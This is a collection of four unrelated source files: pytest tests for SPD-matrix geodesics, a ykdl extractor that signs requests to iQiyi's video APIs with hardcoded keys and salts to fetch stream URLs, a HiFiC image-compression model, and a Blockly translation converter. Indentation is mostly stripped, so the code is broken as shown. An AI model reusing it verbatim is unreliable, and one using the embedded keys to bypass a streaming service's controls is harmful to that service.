def test_simple_mat(self, geodesic_func, get_covmats):
n_channels = 3
if geodesic_func is geodesic_euclid:
A = 1.0 * np.eye(n_channels)
B = 2.0 * np.eye(n_channels)
Ctrue = 1.5 * np.eye(n_channels)
else:
A = 0.5 * np.eye(n_channels)
B = 2 * np.eye(n_channels)
Ctrue = np.eye(n_channels)
self.geodesic_0(geodesic_func, A, B)
self.geodesic_1(geodesic_func, A, B)
self.geodesic_middle(geodesic_func, A, B, Ctrue)
def test_random_mat(self, geodesic_func, get_covmats):
n_trials, n_channels = 2, 5
covmats = get_covmats(n_trials, n_channels)
A, B = covmats[0], covmats[1]
if geodesic_func is geodesic_euclid:
Ctrue = mean_euclid(covmats)
elif geodesic_func is geodesic_logeuclid:
Ctrue = mean_logeuclid(covmats)
elif geodesic_func is geodesic_riemann:
Ctrue = mean_riemann(covmats)
self.geodesic_0(geodesic_func, A, B)
self.geodesic_1(geodesic_func, A, B)
self.geodesic_middle(geodesic_func, A, B, Ctrue)
class TestGeodesicFunc(GeodesicFuncTestCase):
def geodesic_0(self, geodesic_func, A, B):
assert geodesic_func(A, B, 0) == approx(A)
def geodesic_1(self, geodesic_func, A, B):
assert geodesic_func(A, B, 1) == approx(B)
def geodesic_middle(self, geodesic_func, A, B, Ctrue):
assert geodesic_func(A, B, 0.5) == approx(Ctrue)
@pytest.mark.parametrize("metric", get_geod_name())
def test_distance_wrapper_simple(metric):
n_channels = 3
if metric == "euclid":
A = 1.0 * np.eye(n_channels)
B = 2.0 * np.eye(n_channels)
Ctrue = 1.5 * np.eye(n_channels)
else:
A = 0.5 * np.eye(n_channels)
B = 2 * np.eye(n_channels)
Ctrue = np.eye(n_channels)
assert geodesic(A, B, 0.5, metric=metric) == approx(Ctrue)
@pytest.mark.parametrize("met, gfunc", zip(get_geod_name(), get_geod_func()))
def test_distance_wrapper_random(met, gfunc, get_covmats):
n_trials, n_channels = 2, 5
covmats = get_covmats(n_trials, n_channels)
A, B = covmats[0], covmats[1]
if gfunc is geodesic_euclid:
Ctrue = mean_euclid(covmats)
elif gfunc is geodesic_logeuclid:
Ctrue = mean_logeuclid(covmats)
elif gfunc is geodesic_riemann:
Ctrue = mean_riemann(covmats)
assert geodesic(A, B, 0.5, metric=met) == approx(Ctrue)
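# Illustrative addition (not in the original suite): for these commuting SPD
# matrices the Riemannian geodesic midpoint of 0.5*I and 2*I is the geometric
# mean sqrt(0.5 * 2) * I = I, matching the simple cases used above.
def test_geodesic_riemann_midpoint_identity_sketch():
    n_channels = 3
    A = 0.5 * np.eye(n_channels)
    B = 2.0 * np.eye(n_channels)
    assert geodesic(A, B, 0.5, metric="riemann") == approx(np.eye(n_channels))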
|
ykdl/extractors/iqiyi/video.py
|
SeaHOH/ykdl
| 136 |
76291
|
<reponame>SeaHOH/ykdl
# -*- coding: utf-8 -*-
from .._common import *
from .util import md5, md5x, cmd5x
# vms
# src=1702633101b340d8917a69cf8a4b8c7c
# salt=t6hrq6k0n6n6k6qdh6tje6wpb62v7654
# salt=u6fnp3eok0dpftcq9qbr4n9svk8tqh7u
# src=02020031010000000000
# salt=3sj8xof48xof4tk9f4tk9ypgk9ypg5ul
def gettmts(tvid, vid):
tm = int(time.time() * 1000)
key = 'd5fb4bd9d50c4be6948c97edd7254b0e'
host = 'https://cache.m.iqiyi.com'
params = {
'src': '76f90cbd92f94a2e925d83e8ccd22cb7',
'sc': md5(str(tm) + key + vid),
't': tm
}
req_url = '{host}/tmts/{tvid}/{vid}/'.format(**vars())
return get_response(req_url, params=params).json()
def getdash(tvid, vid, bid=500):
cmd5x_null = cmd5x('')
tm = int(time.time() * 1000)
host = 'https://cache.video.iqiyi.com'
params = urlencode({
#'uid': '',
'k_uid': get_random_id(32, 'k_uid'), # necessary
#'dfp': dfp,
#'pck': '',
#'bop': '{{"version":"10.0","dfp":"{dfp}"}}'.format(dfp=dfp),
# keys above are relative to cookies
'tvid': tvid,
'bid': bid,
'vid': vid,
'src': '01010031010000000000',
'vt': 0,
'rs': 1,
'ori': 'pcw',
'ps': 1,
'pt': 0,
'd': 0,
's': '',
'lid': '',
'cf': '',
'ct': '',
'authKey': cmd5x('{cmd5x_null}{tm}{tvid}'.format(**vars())),
'k_tag': 1,
'ost': 0,
'ppt': 0,
'locale': 'zh_cn',
'prio': '{"ff":"f4v","code":2}',
'k_err_retries': 0,
'up': '',
'qd_v': 2,
'tm': tm,
'qdy': 'a',
'qds': 0,
'ut': 0, # 600 bid isn't available
# relative to encode
#'k_ft1': ,
#'k_ft4': ,
#'k_ft5': ,
})
src = '/dash?' + params
vf = cmd5x(src)
req_url = '{host}{src}&vf={vf}'.format(**vars())
return get_response(req_url).json()
def getvps(tvid, vid):
tm = int(time.time() * 1000)
host = 'http://cache.video.qiyi.com'
params = urlencode({
'tvid': tvid,
'vid': vid,
'v': 0,
'qypid': '{}_12'.format(tvid),
'src': '01012001010000000000',
't': tm,
'k_tag': 1,
'k_uid': get_random_id(32, 'k_uid'),
'rs': 1,
})
src = '/vps?' + params
vf = md5x(src)
req_url = '{host}{src}&vf={vf}'.format(**vars())
return get_response(req_url).json()
class Iqiyi(Extractor):
name = '爱奇艺 (Iqiyi)'
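    # Reverse lookup built from {quality id: [vd/bid codes]}: every numeric vd or
    # bid code maps back to its quality id, e.g. 4, 17 and 500 all map to 'TD'.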
vd_2_id = dict(sum([[(vd, id) for vd in vds] for id, vds in {
'4K': [10, 19],
'BD': [5, 18, 600],
'TD': [4, 17, 500],
'HD': [2, 14, 21, 75, 300],
'SD': [1, 200],
'LD': [96, 100]
}.items()], []))
id_2_profile = {
'4K': '4K',
'BD': '1080p',
'TD': '720p',
'HD': '540p',
'SD': '360p',
'LD': '210p'
}
def prepare(self):
info = MediaInfo(self.name)
if self.url and not self.vid:
vid = match(self.url, 'curid=([^_]+)_([\w]+)')
if vid:
self.vid = vid
try:
info_json = get_response(
'http://pcw-api.iqiyi.com/video/video/playervideoinfo',
params={'tvid': self.vid[0]}).json()
info.title = info_json['data']['vn']
except:
self.vid = None
def get_vid():
html = get_content(self.url)
video_info = match1(html, ":video-info='(.+?)'")
if video_info:
video_info = json.loads(video_info)
self.vid = str(video_info['tvId']), str(video_info['vid'])
info.title = video_info['name']
else:
tvid = match1(html,
'tvId:\s*"([^"]+)',
'data-video-tvId="([^"]+)',
'''\['tvid'\]\s*=\s*"([^"]+)''',
'"tvId":\s*([^,]+)')
videoid = match1(html,
'data-video-vid="([^"]+)',
'vid"?\'?\]?\s*(?:=|:)\s*"?\'?([^"\',]+)')
if not (tvid and videoid):
url = match1(html, '(www\.iqiyi\.com/v_\w+\.html)')
if url:
self.url = 'https://' + url
return get_vid()
self.vid = (tvid, videoid)
info.title = match1(html, '<title>([^<]+)').split('-')[0]
if self.url and not self.vid:
get_vid()
tvid, vid = self.vid
assert tvid and vid, "can't play this video!!"
def push_stream_vd(vs):
vd = vs['vd']
stream = self.vd_2_id[vd]
stream_profile = self.id_2_profile[stream]
fmt = vs.get('fileFormat')
if fmt:
stream += '-' + fmt
m3u8 = vs['m3utx']
info.streams[stream] = {
'video_profile': stream_profile,
'container': 'm3u8',
'src': [m3u8],
'size': 0
}
def push_stream_bid(url_prefix, bid, container, fs_array, size):
stream = self.vd_2_id[bid]
real_urls = []
for seg_info in fs_array:
url = url_prefix + seg_info['l']
json_data = get_response(url).json()
down_url = json_data['l']
real_urls.append(down_url)
stream_profile = self.id_2_profile[stream]
info.streams[stream] = {
'video_profile': stream_profile,
'container': container,
'src': real_urls,
'size': size
}
def fetch_tmts():
#raise
# try use tmts first
# less http requests, get results quickly
tmts_data = gettmts(tvid, vid)
assert tmts_data['code'] == 'A00000'
vs_array = tmts_data['data']['vidl']
for vs in vs_array:
push_stream_vd(vs)
vip_conf = tmts_data['data'].get('ctl', {}).get('configs')
if vip_conf:
for vds in (('5', '18'), ('10', '19')):
for vd in vds:
if vd in vip_conf:
tmts_data = gettmts(tvid, vip_conf[vd]['vid'])
if tmts_data['code'] == 'A00000':
push_stream_vd(tmts_data['data'])
break
def fetch_vps():
# use vps as preferred fallback
vps_data = getvps(tvid, vid)
assert vps_data['code'] == 'A00000'
url_prefix = vps_data['data']['vp'].get('du')
assert url_prefix
vs_array = vps_data['data']['vp']['tkl'][0]['vs']
for vs in vs_array:
bid = vs['bid']
fs_array = vs['fs']
size = vs['vsize']
push_stream_bid(url_prefix, bid, 'flv', fs_array, size)
def fetch_dash():
# use dash as fallback
for bid in (500, 300, 200, 100):
dash_data = getdash(tvid, vid, bid)
assert dash_data['code'] == 'A00000'
url_prefix = dash_data['data'].get('dd')
if url_prefix is None:
continue
streams = dash_data['data']['program']['video']
for stream in streams:
if 'fs' in stream:
_bid = stream['bid']
container = stream['ff']
fs_array = stream['fs']
size = stream['vsize']
push_stream_bid(url_prefix, _bid, container, fs_array, size)
break
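        # Fallback chain: an AssertionError from a fetcher aborts the chain
        # immediately, while any other exception is logged and the next
        # fetcher is tried.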
for fetch in (fetch_tmts, fetch_vps, fetch_dash):
try:
fetch()
break
except AssertionError:
break
except Exception as e:
self.logger.debug(e, exc_info=True)
continue
assert info.streams, "can't play this video!!"
return info
def prepare_list(self):
html = get_content(self.url)
return matchall(html, 'data-tvid=\"([^\"]+)\" data-vid=\"([^\"]+)\"')
site = Iqiyi()
|
src/model.py
|
markveillette/high-fidelity-generative-compression
| 266 |
76314
|
<filename>src/model.py
"""
Stitches submodels together.
"""
import numpy as np
import time, os
import itertools
from functools import partial
from collections import defaultdict, namedtuple
import torch
import torch.nn as nn
import torch.nn.functional as F
# Custom modules
from src import hyperprior
from src.loss import losses
from src.helpers import maths, datasets, utils
from src.network import encoder, generator, discriminator, hyper
from src.loss.perceptual_similarity import perceptual_loss as ps
from default_config import ModelModes, ModelTypes, hific_args, directories
Intermediates = namedtuple("Intermediates",
["input_image", # [0, 1] (after scaling from [0, 255])
"reconstruction", # [0, 1]
"latents_quantized", # Latents post-quantization.
"n_bpp", # Differential entropy estimate.
"q_bpp"]) # Shannon entropy estimate.
Disc_out= namedtuple("disc_out",
["D_real", "D_gen", "D_real_logits", "D_gen_logits"])
class Model(nn.Module):
def __init__(self, args, logger, storage_train=defaultdict(list), storage_test=defaultdict(list), model_mode=ModelModes.TRAINING,
model_type=ModelTypes.COMPRESSION):
super(Model, self).__init__()
"""
Builds hific model from submodels in network.
"""
self.args = args
self.model_mode = model_mode
self.model_type = model_type
self.logger = logger
self.log_interval = args.log_interval
self.storage_train = storage_train
self.storage_test = storage_test
self.step_counter = 0
if self.args.use_latent_mixture_model is True:
self.args.latent_channels = self.args.latent_channels_DLMM
if not hasattr(ModelTypes, self.model_type.upper()):
raise ValueError("Invalid model_type: [{}]".format(self.model_type))
if not hasattr(ModelModes, self.model_mode.upper()):
raise ValueError("Invalid model_mode: [{}]".format(self.model_mode))
self.image_dims = self.args.image_dims # Assign from dataloader
self.batch_size = self.args.batch_size
self.entropy_code = False
if model_mode == ModelModes.EVALUATION:
self.entropy_code = True
self.Encoder = encoder.Encoder(self.image_dims, self.batch_size, C=self.args.latent_channels,
channel_norm=self.args.use_channel_norm)
self.Generator = generator.Generator(self.image_dims, self.batch_size, C=self.args.latent_channels,
n_residual_blocks=self.args.n_residual_blocks, channel_norm=self.args.use_channel_norm, sample_noise=
self.args.sample_noise, noise_dim=self.args.noise_dim)
if self.args.use_latent_mixture_model is True:
self.Hyperprior = hyperprior.HyperpriorDLMM(bottleneck_capacity=self.args.latent_channels,
likelihood_type=self.args.likelihood_type, mixture_components=self.args.mixture_components, entropy_code=self.entropy_code)
else:
self.Hyperprior = hyperprior.Hyperprior(bottleneck_capacity=self.args.latent_channels,
likelihood_type=self.args.likelihood_type, entropy_code=self.entropy_code)
self.amortization_models = [self.Encoder, self.Generator]
self.amortization_models.extend(self.Hyperprior.amortization_models)
# Use discriminator if GAN mode enabled and in training/validation
self.use_discriminator = (
self.model_type == ModelTypes.COMPRESSION_GAN
and (self.model_mode != ModelModes.EVALUATION)
)
if self.use_discriminator is True:
assert self.args.discriminator_steps > 0, 'Must specify nonzero training steps for D!'
self.discriminator_steps = self.args.discriminator_steps
self.logger.info('GAN mode enabled. Training discriminator for {} steps.'.format(
self.discriminator_steps))
self.Discriminator = discriminator.Discriminator(image_dims=self.image_dims,
context_dims=self.args.latent_dims, C=self.args.latent_channels)
self.gan_loss = partial(losses.gan_loss, args.gan_loss_type)
else:
self.discriminator_steps = 0
self.Discriminator = None
self.squared_difference = torch.nn.MSELoss(reduction='none')
# Expects [-1,1] images or [0,1] with normalize=True flag
self.perceptual_loss = ps.PerceptualLoss(model='net-lin', net='alex', use_gpu=torch.cuda.is_available(), gpu_ids=[args.gpu])
def store_loss(self, key, loss):
assert type(loss) == float, 'Call .item() on loss before storage'
if self.training is True:
storage = self.storage_train
else:
storage = self.storage_test
if self.writeout is True:
storage[key].append(loss)
def compression_forward(self, x):
"""
Forward pass through encoder, hyperprior, and decoder.
Inputs
x: Input image. Format (N,C,H,W), range [0,1],
or [-1,1] if args.normalize_image is True
torch.Tensor
Outputs
intermediates: NamedTuple of intermediate values
"""
image_dims = tuple(x.size()[1:]) # (C,H,W)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_encoder_downsamples = self.Encoder.n_downsampling_layers
factor = 2 ** n_encoder_downsamples
x = utils.pad_factor(x, x.size()[2:], factor)
# Encoder forward pass
y = self.Encoder(x)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
factor = 2 ** n_hyperencoder_downsamples
y = utils.pad_factor(y, y.size()[2:], factor)
hyperinfo = self.Hyperprior(y, spatial_shape=x.size()[2:])
latents_quantized = hyperinfo.decoded
total_nbpp = hyperinfo.total_nbpp
total_qbpp = hyperinfo.total_qbpp
# Use quantized latents as input to G
reconstruction = self.Generator(latents_quantized)
if self.args.normalize_input_image is True:
reconstruction = torch.tanh(reconstruction)
# Undo padding
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
reconstruction = reconstruction[:, :, :image_dims[1], :image_dims[2]]
intermediates = Intermediates(x, reconstruction, latents_quantized,
total_nbpp, total_qbpp)
return intermediates, hyperinfo
def discriminator_forward(self, intermediates, train_generator):
""" Train on gen/real batches simultaneously. """
x_gen = intermediates.reconstruction
x_real = intermediates.input_image
# Alternate between training discriminator and compression models
if train_generator is False:
x_gen = x_gen.detach()
D_in = torch.cat([x_real, x_gen], dim=0)
latents = intermediates.latents_quantized.detach()
latents = torch.repeat_interleave(latents, 2, dim=0)
D_out, D_out_logits = self.Discriminator(D_in, latents)
D_out = torch.squeeze(D_out)
D_out_logits = torch.squeeze(D_out_logits)
D_real, D_gen = torch.chunk(D_out, 2, dim=0)
D_real_logits, D_gen_logits = torch.chunk(D_out_logits, 2, dim=0)
return Disc_out(D_real, D_gen, D_real_logits, D_gen_logits)
def distortion_loss(self, x_gen, x_real):
        # Loss is computed in [0, 255] space; rather than dividing by 255 here,
        # scaling is delegated to the k_M weighting in compression_loss.
sq_err = self.squared_difference(x_gen*255., x_real*255.) # / 255.
return torch.mean(sq_err)
def perceptual_loss_wrapper(self, x_gen, x_real, normalize=True):
""" Assumes inputs are in [0, 1] if normalize=True, else [-1, 1] """
LPIPS_loss = self.perceptual_loss.forward(x_gen, x_real, normalize=normalize)
return torch.mean(LPIPS_loss)
def compression_loss(self, intermediates, hyperinfo):
x_real = intermediates.input_image
x_gen = intermediates.reconstruction
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
x_real = (x_real + 1.) / 2.
x_gen = (x_gen + 1.) / 2.
distortion_loss = self.distortion_loss(x_gen, x_real)
perceptual_loss = self.perceptual_loss_wrapper(x_gen, x_real, normalize=True)
weighted_distortion = self.args.k_M * distortion_loss
weighted_perceptual = self.args.k_P * perceptual_loss
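        # Total objective below: weighted_rate + k_M * MSE + k_P * LPIPS; the
        # beta-weighted generator loss is added later in forward() when the
        # discriminator is enabled.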
weighted_rate, rate_penalty = losses.weighted_rate_loss(self.args, total_nbpp=intermediates.n_bpp,
total_qbpp=intermediates.q_bpp, step_counter=self.step_counter, ignore_schedule=self.args.ignore_schedule)
weighted_R_D_loss = weighted_rate + weighted_distortion
weighted_compression_loss = weighted_R_D_loss + weighted_perceptual
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('rate_penalty', rate_penalty)
self.store_loss('distortion', distortion_loss.item())
self.store_loss('perceptual', perceptual_loss.item())
self.store_loss('n_rate', intermediates.n_bpp.item())
self.store_loss('q_rate', intermediates.q_bpp.item())
self.store_loss('n_rate_latent', hyperinfo.latent_nbpp.item())
self.store_loss('q_rate_latent', hyperinfo.latent_qbpp.item())
self.store_loss('n_rate_hyperlatent', hyperinfo.hyperlatent_nbpp.item())
self.store_loss('q_rate_hyperlatent', hyperinfo.hyperlatent_qbpp.item())
self.store_loss('weighted_rate', weighted_rate.item())
self.store_loss('weighted_distortion', weighted_distortion.item())
self.store_loss('weighted_perceptual', weighted_perceptual.item())
self.store_loss('weighted_R_D', weighted_R_D_loss.item())
self.store_loss('weighted_compression_loss_sans_G', weighted_compression_loss.item())
return weighted_compression_loss
def GAN_loss(self, intermediates, train_generator=False):
"""
train_generator: Flag to send gradients to generator
"""
disc_out = self.discriminator_forward(intermediates, train_generator)
D_loss = self.gan_loss(disc_out, mode='discriminator_loss')
G_loss = self.gan_loss(disc_out, mode='generator_loss')
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('D_gen', torch.mean(disc_out.D_gen).item())
self.store_loss('D_real', torch.mean(disc_out.D_real).item())
self.store_loss('disc_loss', D_loss.item())
self.store_loss('gen_loss', G_loss.item())
self.store_loss('weighted_gen_loss', (self.args.beta * G_loss).item())
return D_loss, G_loss
def compress(self, x, silent=False):
"""
* Pass image through encoder to obtain latents: x -> Encoder() -> y
* Pass latents through hyperprior encoder to obtain hyperlatents:
y -> hyperencoder() -> z
* Encode hyperlatents via nonparametric entropy model.
* Pass hyperlatents through mean-scale hyperprior decoder to obtain mean,
scale over latents: z -> hyperdecoder() -> (mu, sigma).
* Encode latents via entropy model derived from (mean, scale) hyperprior output.
"""
assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
f'Set model mode to {ModelModes.EVALUATION} for compression.')
spatial_shape = tuple(x.size()[2:])
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_encoder_downsamples = self.Encoder.n_downsampling_layers
factor = 2 ** n_encoder_downsamples
x = utils.pad_factor(x, x.size()[2:], factor)
# Encoder forward pass
y = self.Encoder(x)
if self.model_mode == ModelModes.EVALUATION and (self.training is False):
n_hyperencoder_downsamples = self.Hyperprior.analysis_net.n_downsampling_layers
factor = 2 ** n_hyperencoder_downsamples
y = utils.pad_factor(y, y.size()[2:], factor)
compression_output = self.Hyperprior.compress_forward(y, spatial_shape)
attained_hbpp = 32 * len(compression_output.hyperlatents_encoded) / np.prod(spatial_shape)
attained_lbpp = 32 * len(compression_output.latents_encoded) / np.prod(spatial_shape)
attained_bpp = 32 * ((len(compression_output.hyperlatents_encoded) +
len(compression_output.latents_encoded)) / np.prod(spatial_shape))
if silent is False:
self.logger.info('[ESTIMATED]')
self.logger.info(f'BPP: {compression_output.total_bpp:.3f}')
self.logger.info(f'HL BPP: {compression_output.hyperlatent_bpp:.3f}')
self.logger.info(f'L BPP: {compression_output.latent_bpp:.3f}')
self.logger.info('[ATTAINED]')
self.logger.info(f'BPP: {attained_bpp:.3f}')
self.logger.info(f'HL BPP: {attained_hbpp:.3f}')
self.logger.info(f'L BPP: {attained_lbpp:.3f}')
return compression_output
def decompress(self, compression_output):
"""
* Recover z* from compressed message.
        * Pass recovered hyperlatents through mean-scale hyperprior decoder to obtain mean,
scale over latents: z -> hyperdecoder() -> (mu, sigma).
* Use latent entropy model to recover y* from compressed image.
* Pass quantized latent through generator to obtain the reconstructed image.
y* -> Generator() -> x*.
"""
assert self.model_mode == ModelModes.EVALUATION and (self.training is False), (
f'Set model mode to {ModelModes.EVALUATION} for decompression.')
latents_decoded = self.Hyperprior.decompress_forward(compression_output, device=utils.get_device())
# Use quantized latents as input to G
reconstruction = self.Generator(latents_decoded)
if self.args.normalize_input_image is True:
reconstruction = torch.tanh(reconstruction)
# Undo padding
image_dims = compression_output.spatial_shape
reconstruction = reconstruction[:, :, :image_dims[0], :image_dims[1]]
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
reconstruction = (reconstruction + 1.) / 2.
reconstruction = torch.clamp(reconstruction, min=0., max=1.)
return reconstruction
def forward(self, x, train_generator=False, return_intermediates=False, writeout=True):
self.writeout = writeout
losses = dict()
if train_generator is True:
# Define a 'step' as one cycle of G-D training
self.step_counter += 1
intermediates, hyperinfo = self.compression_forward(x)
if self.model_mode == ModelModes.EVALUATION:
reconstruction = intermediates.reconstruction
if self.args.normalize_input_image is True:
# [-1.,1.] -> [0.,1.]
reconstruction = (reconstruction + 1.) / 2.
reconstruction = torch.clamp(reconstruction, min=0., max=1.)
return reconstruction, intermediates.q_bpp
compression_model_loss = self.compression_loss(intermediates, hyperinfo)
if self.use_discriminator is True:
# Only send gradients to generator when training generator via
# `train_generator` flag
D_loss, G_loss = self.GAN_loss(intermediates, train_generator)
weighted_G_loss = self.args.beta * G_loss
compression_model_loss += weighted_G_loss
losses['disc'] = D_loss
losses['compression'] = compression_model_loss
# Bookkeeping
if (self.step_counter % self.log_interval == 1):
self.store_loss('weighted_compression_loss', compression_model_loss.item())
if return_intermediates is True:
return losses, intermediates
else:
return losses
if __name__ == '__main__':
compress_test = False
if compress_test is True:
model_mode = ModelModes.EVALUATION
else:
model_mode = ModelModes.TRAINING
logger = utils.logger_setup(logpath=os.path.join(directories.experiments, 'logs'), filepath=os.path.abspath(__file__))
device = utils.get_device()
logger.info(f'Using device {device}')
storage_train = defaultdict(list)
storage_test = defaultdict(list)
model = Model(hific_args, logger, storage_train, storage_test, model_mode=model_mode, model_type=ModelTypes.COMPRESSION_GAN)
model.to(device)
logger.info(model)
transform_param_names = list()
transform_params = list()
logger.info('ALL PARAMETERS')
for n, p in model.named_parameters():
if ('Encoder' in n) or ('Generator' in n):
transform_param_names.append(n)
transform_params.append(p)
if ('analysis' in n) or ('synthesis' in n):
transform_param_names.append(n)
transform_params.append(p)
logger.info(f'{n} - {p.shape}')
logger.info('AMORTIZATION PARAMETERS')
amortization_named_parameters = itertools.chain.from_iterable(
[am.named_parameters() for am in model.amortization_models])
for n, p in amortization_named_parameters:
logger.info(f'{n} - {p.shape}')
    logger.info('TRANSFORM PARAMETERS')
for n, p in zip(transform_param_names, transform_params):
logger.info(f'{n} - {p.shape}')
logger.info('HYPERPRIOR PARAMETERS')
for n, p in model.Hyperprior.hyperlatent_likelihood.named_parameters():
logger.info(f'{n} - {p.shape}')
if compress_test is False:
logger.info('DISCRIMINATOR PARAMETERS')
for n, p in model.Discriminator.named_parameters():
logger.info(f'{n} - {p.shape}')
logger.info("Number of trainable parameters: {}".format(utils.count_parameters(model)))
logger.info("Estimated size: {} MB".format(utils.count_parameters(model) * 4. / 10**6))
B = 10
shape = [B, 3, 256, 256]
x = torch.randn(shape).to(device)
start_time = time.time()
if compress_test is True:
model.eval()
logger.info('Starting compression with input shape {}'.format(shape))
compression_output = model.compress(x)
reconstruction = model.decompress(compression_output)
logger.info(f"n_bits: {compression_output.total_bits}")
logger.info(f"bpp: {compression_output.total_bpp}")
logger.info(f"MSE: {torch.mean(torch.square(reconstruction - x)).item()}")
else:
logger.info('Starting forward pass with input shape {}'.format(shape))
losses = model(x)
compression_loss, disc_loss = losses['compression'], losses['disc']
logger.info('Delta t {:.3f}s'.format(time.time() - start_time))
|
i18n/json_to_js.py
|
bharati-software/blockly-games-Kannada
| 1,184 |
76325
|
<reponame>bharati-software/blockly-games-Kannada<gh_stars>1000+
#!/usr/bin/python
# Converts .json files from Translatewiki into .js files.
#
# Copyright 2013 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import codecs # for codecs.open(..., 'utf-8')
import glob
import json # for json.load()
import os # for os.path()
import subprocess # for subprocess.check_call()
from common import InputError
# Store parsed command-line arguments in global variable.
args = None
def _insert_breaks(s, min_length, max_length):
"""Inserts line breaks to try to get line lengths within the given range.
This tries to minimize raggedness and to break lines at punctuation
(periods and commas). It never splits words or numbers. Multiple spaces
may be converted into single spaces.
Args:
s: The string to split.
min_length: The requested minimum number of characters per line.
    max_length: The requested maximum number of characters per line.
Returns:
A copy of the original string with zero or more line breaks inserted.
"""
newline = '\\n'
if len(s) < min_length:
return s
# Try splitting by sentences. This assumes sentences end with periods.
sentences = s.split('.')
# Remove empty sentences.
sentences = [sen for sen in sentences if sen]
# If all sentences are at least min_length and at most max_length,
# then return one per line.
if not [sen for sen in sentences if
len(sen) > max_length or len(sen) < min_length]:
return newline.join([sen.strip() + '.' for sen in sentences])
# Otherwise, divide into words, and use a greedy algorithm for the first
# line, and try to get later lines as close as possible in length.
words = [word for word in s.split(' ') if word]
line1 = ''
while (len(line1) + 1 + len(words[0]) < max_length and
# Preferentially split on periods and commas.
(not ((line1.endswith('. ') or line1.endswith(', ')) and
len(line1) > min_length))):
line1 += words.pop(0) + ' '
# If it all fits on one line, return that line.
if not words:
return line1
ideal_length = len(line1)
output = line1
line = ''
while words:
line += words.pop(0) + ' '
if words:
potential_len = len(line) + len(words[0])
if (potential_len > max_length or
potential_len - ideal_length > ideal_length - len(line) or
(line.endswith('. ') and len(line) > min_length)):
output += newline + line
line = ''
output += newline + line
return output
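# Illustrative sketch (not part of the original script): when every sentence
# already fits the requested bounds, the text comes back one sentence per line,
# joined by a literal '\n' escape (the two-character sequence written to .xlf).
def _example_insert_breaks():
  text = 'Moves the player forward. Turns the player left.'
  return _insert_breaks(text, 10, 50)
  # -> 'Moves the player forward.\nTurns the player left.'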
def _create_xlf(target_lang):
"""Creates a <target_lang>.xlf file for Soy.
Args:
target_lang: The ISO 639 language code for the target language.
This is used in the name of the file and in the metadata.
Returns:
A pointer to a file to which the metadata has been written.
Raises:
IOError: An error occurred while opening or writing the file.
"""
filename = os.path.join(os.curdir, args.output_dir, target_lang + '.xlf')
out_file = codecs.open(filename, 'w', 'utf-8')
out_file.write("""<?xml version="1.0" encoding="UTF-8"?>
<xliff version="1.2" xmlns="urn:oasis:names:tc:xliff:document:1.2">
<file original="SoyMsgBundle"
datatype="x-soy-msg-bundle"
xml:space="preserve"
source-language="{0}"
target-language="{1}">
<body>""".format(args.source_lang, target_lang))
return out_file
def _close_xlf(xlf_file):
"""Closes a <target_lang>.xlf file created with create_xlf().
This includes writing the terminating XML.
Args:
xlf_file: A pointer to a file created by _create_xlf().
Raises:
IOError: An error occurred while writing to or closing the file.
"""
xlf_file.write("""
</body>
</file>
</xliff>
""")
xlf_file.close()
def _process_file(path_to_json, target_lang, key_dict):
"""Creates an .xlf file corresponding to the specified .json input file.
The name of the input file must be target_lang followed by '.json'.
The name of the output file will be target_lang followed by '.js'.
Args:
path_to_json: Path to the directory of xx.json files.
    target_lang: An IETF language code (RFC 4646), such as 'es' or 'pt-br'.
key_dict: Dictionary mapping Blockly keys (e.g., Maze.turnLeft) to
Closure keys (hash numbers).
Raises:
IOError: An I/O error occurred with an input or output file.
InputError: Input JSON could not be parsed.
KeyError: Key found in input file but not in key file.
"""
filename = os.path.join(path_to_json, target_lang + '.json')
in_file = open(filename)
try:
j = json.load(in_file)
in_file.close()
  except ValueError as e:
    print('Error reading ' + filename)
    raise InputError(filename, str(e))
out_file = _create_xlf(target_lang)
for key in j:
if key != '@metadata':
try:
identifier = key_dict[key]
except KeyError as e:
print('Key "%s" is in %s but not in %s' %
(key, filename, args.key_file))
raise e
target = j.get(key)
# Only insert line breaks for tooltips.
if key.lower().find('tooltip') != -1:
target = _insert_breaks(
j.get(key), args.min_length, args.max_length)
out_file.write(u"""
<trans-unit id="{0}" datatype="html">
<target>{1}</target>
</trans-unit>""".format(identifier, target))
_close_xlf(out_file)
def main():
"""Parses arguments and iterates over files."""
# Set up argument parser.
parser = argparse.ArgumentParser(description='Convert JSON files to JS.')
parser.add_argument('--source_lang', default='en',
help='ISO 639-1 source language code')
parser.add_argument('--output_dir', default='generated/',
help='relative directory for output files')
parser.add_argument('--key_file', default='json/keys.json',
help='relative path to input keys file')
parser.add_argument('--template', default='template.soy')
parser.add_argument('--min_length', default=30,
help='minimum line length (not counting last line)')
parser.add_argument('--max_length', default=50,
help='maximum line length (not guaranteed)')
parser.add_argument('--path_to_jar', default='third-party-downloads',
help='relative path from working directory to '
'SoyToJsSrcCompiler.jar')
parser.add_argument('files', nargs='+', help='input files')
# Initialize global variables.
global args
args = parser.parse_args()
# Make sure output_dir ends with slash.
if (not args.output_dir.endswith(os.path.sep)):
args.output_dir += os.path.sep
# Read in keys.json, mapping descriptions (e.g., Maze.turnLeft) to
# Closure keys (long hash numbers).
key_file = open(args.key_file)
key_dict = json.load(key_file)
key_file.close()
# Process each input file.
print('Creating .xlf files...')
processed_langs = []
if len(args.files) == 1:
# Windows does not expand globs automatically.
args.files = glob.glob(args.files[0])
for arg_file in args.files:
(path_to_json, filename) = os.path.split(arg_file)
if not filename.endswith('.json'):
raise InputError(filename, 'filenames must end with ".json"')
target_lang = filename[:filename.index('.')]
if not target_lang in ('qqq', 'keys'):
processed_langs.append(target_lang)
_process_file(path_to_json, target_lang, key_dict)
# Output command line for Closure compiler.
